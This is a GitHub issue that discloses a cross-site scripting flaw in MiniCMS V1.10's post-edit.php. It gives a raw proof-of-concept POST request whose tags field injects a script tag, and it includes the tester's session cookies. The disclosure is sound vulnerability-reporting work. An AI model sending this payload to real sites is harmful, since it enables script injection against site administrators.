Skip to content

MiniCMS V1.10 has XSS in the mc-admin/post-edit.php  #22

Closed
@PrincyEdward

Description

@PrincyEdward

MiniCMS V1.10 has XSS in the mc-admin/post-edit.php via tags parameter

Affected Version : MiniCMS V1.10
Affected URL: http://{host}/MiniCMS-1.10/mc-admin/post-edit.php

POC:

POST /princy/minicms/minicms_1.10_latest/MiniCMS-1.10/mc-admin/post-edit.php?id=aaaaaa HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://host/princy/minicms/minicms_1.10_latest/MiniCMS-1.10/mc-admin/post-edit.php?id=aaaaaa
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
Cookie: mc_token=c30807e6587ade285ba7ade9f881b3d7; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1531738241,1533619522; __atuvc=2%7C30%2C0%7C31%2C0%7C32%2C0%7C33%2C1%7C34; rcc_accepted=1; sidenav_treesearch=; sidenav_treegroupStatus=; admin_auth=eyJpdiI6ImtNXC8xRHViQ1Z1Zks0cUJXclwva0hxZz09IiwidmFsdWUiOiJQclBudG5vTmh0YWVuKzdwNUpHTm1VSHJDdVNjVys4cmNybVV3cVFNb0tYdVY0QXdXVU0rVUhCT0wxTjN1V3lVWnNhZCt2UG8rZ0ZoRzVPQU1MSTNwNzFKUXFhaittS1Z6cThZemlja1lTdFIrdzJiRzFZdHd3eUJIaElTdG5xXC8iLCJtYWMiOiIxMTkxMDg5MWY4Y2Q5ODI5YTE0M2JmYTAxNjZmMzdiZDFlMWYxNTlmY2YyZmVlNGY5OWEyZjhmMjZlYjI4MWQzIn0%3D;
Connection: close
Upgrade-Insecure-Requests: 1

IS_POST_BACK=&title=Prince&content=&tags=%22%3E%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&year=2018&month=08&day=30&hourse=07&minute=40&second=33&can_comment=1&state=draft&id=aaaaaa&save=%E4%BF%9D%E5%AD%98

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions